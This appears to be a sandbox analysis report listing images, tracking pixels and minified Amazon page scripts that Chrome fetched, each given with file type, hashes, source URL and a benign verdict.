                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!1.."A.Qaq.2U.....#BRbr......37..$Ccst.....%68DSTu.....4Vv...5E............................!..1.."2AQRa.....Sq......B...#34br..5C..$%..c.............?.....P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...........P..@(......P..@(......t.zP.....T.......2....{moW..D.+.).{Yv.#....N,Y.\.Gh(yL..\W.*i.....RT?R..w!......w....CW../.Q.O.@.%6.8...rL.......nin)}.....#6..}..#^..O].H....>[Yuj.V....P.v.;e7.^.Tt-.....F).?q5.qe..qX?.U........)x....G..Uq.j.....P....j....~....%.=....;qI=oa^.....".{.....G......]....M..K.......6.nS..FK.?.....G.f"v..M.&[m..:.!.~~.C......+..k.....^.%..l....TBn.u...9.J\......k*.*_r.~........v}..-}..qq)L.2m.W...#?..t}5...L}=.O._....#...K..lov.U....-.$..........8.....P..%.Z..]R.J|h.e.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):276717
                                                                                                                                                                                                                                                                      Entropy (8bit):5.353438150363169
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZjP6LWY6bNXYSidNII
                                                                                                                                                                                                                                                                      MD5:3C66F4A874169140AE54522A79932AB8
                                                                                                                                                                                                                                                                      SHA1:BAE14697244A517EC3626011DB3B7D5842776A1A
                                                                                                                                                                                                                                                                      SHA-256:5B153D0DE899A912C5D4E38C154D2F24D972413566B6C45BB0C26C4B79C46949
                                                                                                                                                                                                                                                                      SHA-512:8FDE61B2CD52D7BD59C745AE11CD0F3B4226C2260B6CF0BB1FF979C8666CCC0DE76AB452ADC40C74A41822C26394AB8085A8EF10947E874998F36BA82657E3A8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D46215%26pc%3D49221%26at%3D49221%26t%3D1724264968415%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.736991922753956
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TygDlbTZKzNCprNgXPYk2Q179xasZdoWqL6iFY0ffLMpyanMa6ocBBEn:LFQzQrWYZQ1aKqm+LMpjYlGn
                                                                                                                                                                                                                                                                      MD5:17DF364681523AA2F7FABB10C5EF9BA1
                                                                                                                                                                                                                                                                      SHA1:DC6A21B6B8E1FB096F6B83088160F4982B9F74D1
                                                                                                                                                                                                                                                                      SHA-256:6D1F74501168A247C6F8B677D118F31981B35AED93872AB8805AE8A083BC6945
                                                                                                                                                                                                                                                                      SHA-512:D8F410E5B3B385784998EEE94B8928080C1A4C9886D25CFEE9AC0FDE4DFF7DC5C6429D1675E337670DB860B26EED9A66A13EC987DFEBAE7CCC5CFB29A8A87488
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................{0...1.i|..SS5}....@...*j.........z..EX.iL.?\[a,...y....]Q.3.........X...)um.`....4{..A..]g.O.v<..;.5\.tN..d[&...=.V?+.9..w.........5.E-......X&.B.UBZR..w.....l..N.."...f..,.............7..<FJ..l.~..(...^.n.[6U...}........=a..d...<o&/..pY.I#.vs|]..e.Y.m.....n}.-.........8.^b..7..'....od./....n.6....&..}|.w.l........e.4...r..ltx...3.Z...Z.|Y..1...<.M..~Q...j......HtLt[.5r"@.H......0}.../..~=G.....?Q..y..@......................................-...........................!3. 02@."#1ABpQa.............3..~hW6+.........t/...j...f......`....v.\.5#..Mo.|9,..e$s.....u.Uy8l..Ql...~..._....m.S...OK..%%.#q.^..\..^..a.Y ...E.R.i...f3.........m.s..6....0Mr.*.....j5.c. ..}..y......S..qG...w....!.V.8.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):15219
                                                                                                                                                                                                                                                                      Entropy (8bit):5.408378924173576
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LA+1NXTmdAVVxLxwEsgiGrdjLKYVu10V4:cGQg9dri
                                                                                                                                                                                                                                                                      MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                                                                                                                      SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                                                                                                                      SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                                                                                                                      SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24922
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948075248770795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1y3TsxC/tpnHK5WJC5wDmdA4RHb0opU4Tv0S:4R8WlT4VpUu/
                                                                                                                                                                                                                                                                      MD5:F1236FA1FD2C3EE497E32CB285BA7433
                                                                                                                                                                                                                                                                      SHA1:65722373055C0C4A2FF5CD3B6ED2DDE575C4FA88
                                                                                                                                                                                                                                                                      SHA-256:9FEF49B5FF03D9C0D986EBEB1A061495754A86AF516EBCAC1808243A4CAEB22B
                                                                                                                                                                                                                                                                      SHA-512:C7F99BB58EF99200E79F551D76190B0DE8A80A1E80BD236F7B3A673560E815768386716847432E32C34775FB19E5FA0009467ECEED5DEE9E1861BC8CB117E040
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ ................-.c..1.z.............l,<.wt..4.k....l$k76^.........5.v).....\..`......M1..lB.VS.t.........,`....QM.r=.3....yE>[.O.Y.j.Cl.&H.......9......?.(.]..H+.{FZ...i................*i...8?......6.n<...y{.q..[..r..\.........5.6m.N.O..4..U.r....,X.b...+_0)..V.}7...............gv.....z..J.-...w7N}...N...}z.).:.......A.n........+K.m9....k...=s.,..'..V..yM.=.{........A.Ph...;.........t.F...0.X.2.{.+.ByO..7.R......cyg.....Wh...?Fj.....p..}........y?...=.+.wP.....=.<n.y.r..v.c....P_..8.}^.T.E..y.?.M....|...]8.......%..fu..6...{9..z.M`....h..(..].......>.M.............Q..'e3V.]..."e.w.s.m4Qn.2p...`....}..2>.........q.......o;..W..s.E...t..c1.../.K._-../w...........T.V_.~k./?....]...G..x=...o.V..X._.M7.........[.#./!.Y.cj.OO....z.y..~.m
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15356
                                                                                                                                                                                                                                                                      Entropy (8bit):7.909313052275716
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:fC1lfHpvT48gkLwV9niXjm5aunLVgDXx0HSkVlTpMcqosM5NNGtO4:f2xL4+LuxneqdlTpPVNW1
                                                                                                                                                                                                                                                                      MD5:6EE628CAD41FEF810090E5DD3061E2AE
                                                                                                                                                                                                                                                                      SHA1:15D60E4F885EF80BD4BFAA9C90A19A33F045F1E5
                                                                                                                                                                                                                                                                      SHA-256:8ECA8EEAE940607A8137EEFFB06FE0B3E66AC2C66FB7F7ED865E490EFEA554E8
                                                                                                                                                                                                                                                                      SHA-512:8352D5D990ECEA9434532408FDD642B2A5C23DF52007641F767082A4C8DC40B186F625614C4EF7CCC5C6742184983298EC99CE1EA244EFF48E88E3159B0CB0F8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41C83Jg7PlL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................................................................................vz;.q'X9...w....3...v..W..3............]!.F?*.}K...d.7...^'....w...W[....E..9..-. .............W...D.~..]t..nr....x-.q.t.{._M..........;.b..}.+`.2....j..5I!*.]...c.#.8_.../u............E._K~YS^..ku.}.)V.}(.0..&ia.iH.`".(..&#T#.gZ..u.......H.Z..........h.............y...~..}.y&.;.KR...I..J.I.,H...FQ..DO.]..1.x.[...<..;&R)..y........u..s....F.^..~`.........5......?[......~.~.*.i..*.....X.a2!..2.mu.|6[.,.g...nR.q.'..T5...<..n.t..=U.}.K.....}9.n...F..........q..v7.....-'=.}n._\....m.kTV.K.B.e..R....}.}..J..3..G.|.....tq.....1..]t...W..5.nl.C].i....l.w...*.y ..........V.V.....>.q..#.W._hyl:7....z.#!>.j....<...O..l...5.^.-...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24922
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948075248770795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1y3TsxC/tpnHK5WJC5wDmdA4RHb0opU4Tv0S:4R8WlT4VpUu/
                                                                                                                                                                                                                                                                      MD5:F1236FA1FD2C3EE497E32CB285BA7433
                                                                                                                                                                                                                                                                      SHA1:65722373055C0C4A2FF5CD3B6ED2DDE575C4FA88
                                                                                                                                                                                                                                                                      SHA-256:9FEF49B5FF03D9C0D986EBEB1A061495754A86AF516EBCAC1808243A4CAEB22B
                                                                                                                                                                                                                                                                      SHA-512:C7F99BB58EF99200E79F551D76190B0DE8A80A1E80BD236F7B3A673560E815768386716847432E32C34775FB19E5FA0009467ECEED5DEE9E1861BC8CB117E040
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Smartwatches-Fireboltt-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ ................-.c..1.z.............l,<.wt..4.k....l$k76^.........5.v).....\..`......M1..lB.VS.t.........,`....QM.r=.3....yE>[.O.Y.j.Cl.&H.......9......?.(.]..H+.{FZ...i................*i...8?......6.n<...y{.q..[..r..\.........5.6m.N.O..4..U.r....,X.b...+_0)..V.}7...............gv.....z..J.-...w7N}...N...}z.).:.......A.n........+K.m9....k...=s.,..'..V..yM.=.{........A.Ph...;.........t.F...0.X.2.{.+.ByO..7.R......cyg.....Wh...?Fj.....p..}........y?...=.+.wP.....=.<n.y.r..v.c....P_..8.}^.T.E..y.?.M....|...]8.......%..fu..6...{9..z.M`....h..(..].......>.M.............Q..'e3V.]..."e.w.s.m4Qn.2p...`....}..2>.........q.......o;..W..s.E...t..c1.../.K._-../w...........T.V_.~k./?....]...G..x=...o.V..X._.M7.........[.#./!.Y.cj.OO....z.y..~.m
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15836
                                                                                                                                                                                                                                                                      Entropy (8bit):7.978033266449793
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:DLIymeTV3dHKy+Njd1wd+nBsHFIjv/NQPSYawJ5iDz+mK:rrxBK9Bgd+n04NQaqT0z+mK
                                                                                                                                                                                                                                                                      MD5:A4623DA9F533B7E5B306B92A74B3EED5
                                                                                                                                                                                                                                                                      SHA1:EF1427F1456C21FF906A066DB5F55A423F743B76
                                                                                                                                                                                                                                                                      SHA-256:78EFF95329687225A8A3BB861A52C2FFB5952DC89330CE25318531A5A8FB4252
                                                                                                                                                                                                                                                                      SHA-512:5A0C530C6115E8ADD987B3F4E2C3746F1C780521FE4997C3F72CF0D29462FF7338FC9E26EF013F97B443404E21923FA7C580070BB0A306C48AA925DB13F8D7D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/712QO6My2CL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."................................................................!1..A"2Qq..3ar.......#6Bbst..%5RTUcu......$4CD...e..S..................................................!1.A.2Qaq..3r....."4BR...$..#...5C.............?..=..7.o..WV.....R./U U2.x.....5k....U..s.S.?R..... P.0.._A...T.........n.v.j..4...j.Y...x.s..w.......7.;P.k.JU7=.qG.....A....<.|.A+.4!1!.+...u...8....V....);m..8...w..A.euI...P;..8...uy.H...Go...*.Q.7.....q...(2j.-..x..G.u.^Z...IP...@....M.H@.E.d'........'..?.7.=@/z..MJ....Q..w...3.?.n.v....)..?...n.r...+....u...m.'...G.7j.'..Gn..#L..8...i{...!...>....N....zM.........9...W.*...~1h_.6_l...!C;Z..C....5.b........?.\.CTc.|..T....KK....K+.8.B..U.4.W+..&.Z..[..../.z..E=(B..{.^..7..V...U..f...).......i.|;..).y...%...hI4Z..4!..+..r..P..D-.r..^.!O.j.....zT.....K...A....d..5.#A.......%}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3646
                                                                                                                                                                                                                                                                      Entropy (8bit):7.851599474948609
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tof+vGceX5qNWyDaD9Y94BaMVvXF4ZDLwobQVEWkajUXrP:0f+vPGmWyDaDf1VkLRbQVnk4UT
                                                                                                                                                                                                                                                                      MD5:9300223E26C7F980B8ACD167152C7839
                                                                                                                                                                                                                                                                      SHA1:FFB0664BA2ADE8400AAEF716CB6C40BD97D66DA0
                                                                                                                                                                                                                                                                      SHA-256:5229027DDCD520105EEF22EB06144D7D8214D930DEBF6ACD790C2B57D694AC79
                                                                                                                                                                                                                                                                      SHA-512:ED66660A14F4CBA097AC09A71046D8B8B0412CD72E27C5B7674DFFB81E6CE6EFE69995A52043126B15BF8959A6922F992D8DEDBFEE2B3523195DCB0DCB07310B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A.."Q.aq.#2Br..R..3...$CSb.................................................!1..."2#Aaq...............?..U)J.JR.R....(.)J.JR.R..i..#...8...P..X^eT.9#.Fj?7...m.$......R.0kv.4j7...]...d.+.@)JP.R......)@)JP.R......)@)Q-?.-.].....m....<.d$.3.....fIP.su.I.. .$....\......d~R.....#.r.5.........8$....<T{..K..d3..L.I..G..e.....k..q...+4R..'.@>_%.O".....P....^....1].8.XXo.b..4.......v.&......Ft.{..!...<@v...V....~..*U.......[*... ....."h..N...........Y.^.Q...l.6.w.._...$.0.#..:....p.w..a......H...-.....G.('$..=..z......kHR.....(.)J.JR.R....j..X&h..U....{c..j....kPo.A&Nv.#`~....$.Zg./8.<.:H..>M..:..QU..:...Zo.........?......d,f..C.F.........D....D..j.pdU.....&.o.....ag.Ry. .p7.Fwg8.d...p..+.2......!.g.U{...........cT..............~?.......%.g
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x158, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1778
                                                                                                                                                                                                                                                                      Entropy (8bit):7.887619929593625
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:Ea2n46oWYsNZR5TN5VBM7PtBwZUS7OBL0qh:Px6xYsNTN5s7PwaSAwqh
                                                                                                                                                                                                                                                                      MD5:CBE743836DB01FC533119F4CA9F8AB0A
                                                                                                                                                                                                                                                                      SHA1:9AD1A2DE0902EB7E4F5A209B58EE45612DA2F5B1
                                                                                                                                                                                                                                                                      SHA-256:CD48F0E87ABA9A54BCB869028BF112AF97F7D3CEB0985847A864EAA6DD1BB6EA
                                                                                                                                                                                                                                                                      SHA-512:C50A92E2D368626ECF37CB249AC7D8E2B8CC694E3F4CE5612D6CAC1A4B54B082C7AC4A4620D029CF21921AC3AE582148FF873DF7E29F9314E29015C757456858
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFF....WEBPVP8 ....P,...*....?...[.)..%.\I.1....-.........9....?.l....~g......Q....8W2..3C.^.tfn.....?v2.c..0..........Y..@.h...Uc"]9.a.o.^.Q.0..n.tvK.W.;...n......Q....Z.H......!...[..be.RBu.?l%..,...&.U...C...*...6....D..>I.. ..8].x.......p{P;..&#P...>..e..u..?X....o...D.C....&....d...z._i....:..\.3.\.J\|......FRy..V"..F....m..R.........hmj...?...H..i.........f.....g.H.'. j7&.:r..u.........lC...f(..J...\R...h.6..br..'.....#.E.....1...y..q.3A+.J...D..;.z...%j...Nx..u}.A..J..W........j`......o...rn.%..k.`.[&.<.0.\...:.~.I....:..<..>>.}<...#=..u.tF]...V.@...g..88x..f.X..e.]...!....\..:.o.NR..0...N\.6.9_3i*..'S...^c.......{.{5.h.A..A..B.D.;n...9........"..w....I....f..^bwS.;..Y..>..,....O...M.j..:.g..A..Du-.?.6O2E..b.ie...s..h...zS..X2.. Jh.m..<.o.(..U...p..{.....b..C.d.%..p.._-."L.B8.#^.].i:D<..b.{.........IH....V.7.LT..6~l..$H.@..F..~t;..U.;..P Z0V.iv.n..j...........".`)...pSTsB.f..X...;.!.}k....".HA..a.9..Cg.<..}r.....\Z.915(_
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):32623
                                                                                                                                                                                                                                                                      Entropy (8bit):7.979197309508208
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:ABCDB5dXobtpQnkMxJz7c/+6E/qk/7RbrkKZqNEkhKBg0zbjkbOHt5ZCos:ABCDNXoRbMdtZ7RsE6h6bj7N5Rs
                                                                                                                                                                                                                                                                      MD5:B8D5AF7692CE01989CFBFCC4906AEAFE
                                                                                                                                                                                                                                                                      SHA1:BDEF4E8FE713D6E1B7EF7DD7CA4BF41046DCBFE3
                                                                                                                                                                                                                                                                      SHA-256:22DD9F2E0ACC61FF6F0B92EFB5723D9AB3C8A6D8DD8ADA23DB61DB25C8F7FAA8
                                                                                                                                                                                                                                                                      SHA-512:D7F030B4F2D08845705E3E6C73191B813F4D0291BB3ACCE615E7933E8AAB094103934F6CE2EB40E210049901730040A0CCB10142D1530D8FF6AEBF8F9DFE8DBA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81yOsv2Uv5L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........4.......................................................................}..,Q.._....."?..a.....~mQx.z..v..$......=........|..&_.I.V.-[.....$..DOB.....~.rM...%...I.Hy..].......wv...|..S.%.t...;..rQ.,_......x..V.rz.y.!.B......3.i.n[MUU...M...=.s......W.......`.D...@.qM.s.t:.},...E.=.2;5,`..[f..........[.*N.2s.2W.u.....N..eI'.<:..)......u1.:."u.]..(p.;.}....he.....HfOE!G].*...K..n.C.......F..#yX.-.=...4..iD...8+I'.?...k..%.f.-q.}k.,I.y..-.o....+...1h.H.Cfs./&.f<..}'.3.._.~}....C..e..<........o'4l.E#dH.E..Z.=Y........&`:....Rl{.0..3I...Y.e._.ev.V.@w../..=....}+^C...4_7...z.|.T.x..A.O..iz.....+.......GhfZ..J.b..?z..J.....>u.eV....b...#n.TiffG...|9~e.`.t...B..M.....|..0.h.g..24..t..I....aM.. .4.+.....}.F+"S.#o..,^._..jX...p...v.X..jL{.8(9..L..i..L....z..lEkI_]>..ln..4..C.9.S...n9|.sA.\.|..s
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14622
                                                                                                                                                                                                                                                                      Entropy (8bit):7.867458077991927
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Lj0bACI6nRAvBhrvBQlD6AE3WJ32D8arKXoKyDuadeLYM:cbLIXBh9kQWJ2QoKuuiesM
                                                                                                                                                                                                                                                                      MD5:C60A77B8880BF976B06488D12FEA13E3
                                                                                                                                                                                                                                                                      SHA1:07E14DFA0BF56E0BCE2EEDAC999878F8DFD3528B
                                                                                                                                                                                                                                                                      SHA-256:A2CD8FA5065A7F5AD75077D385983389DFE212E31D8393EF28D1D7673A3E6CC9
                                                                                                                                                                                                                                                                      SHA-512:9CE72741205EB6553031DEFCD42F1BCABC9977C2EAEA99BC41A7928BFBBBE1293B9F4DE526571FFCED40EE12C36EAD22B270DD4448FB8D43C1DCA4314438717E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF................................................................"!!!"&&&&&&&&&&........... ... &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......................4.........................................................................H....: + ...............O.....?l<.NdW.....<v.|w=..............R..w.Z.uK.>......U...I.t.l..<................GN2...W.]. ...0.N...;Y.w.7}|..........%..p...uo. ......."R................S...z.?^.z$.........u...D.5........,.y...............F..M...QP......9..... ..........6..uZ.y.......!...<..~=.................5.su.d.......eoj.................[....0.....yl... .............D...N.=f.....j...PH......Z..O.d........z.LY.t*...[............9r.k..{.l.$|}........u.a..=p..._3f2..@...."<.G+.3.h.=qIls......."N...O...!....c..R.....[1.w.=.?`!...w..s)...#.....`.(..c.7=<. .!.f..U......./.S.._.hi.H.,R.c^.....<C..A...qSB..$.g..X...=.x.JH.....B.G..`..~.A.`!I.s.....U..K.Gw.....Z...+.....z}.OZ..u .;M......Zz..v.P.....Zx.,y.;...).+.?.....;._.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
